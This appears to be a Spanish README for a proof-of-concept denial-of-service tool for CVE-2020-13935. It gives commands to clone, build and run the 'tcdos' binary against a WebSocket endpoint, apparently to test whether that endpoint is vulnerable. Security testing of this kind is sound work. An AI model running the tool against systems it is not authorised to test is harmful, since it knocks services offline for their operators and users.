
En el artículo de blog correspondiente se explican en detalle el análisis y la explotación de la vulnerabilidad.
Clona el repositorio y, a continuación, compila el binario tcdos. Ejecuta el programa de la siguiente manera para probar si un endpoint WebSocket concreto es vulnerable:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]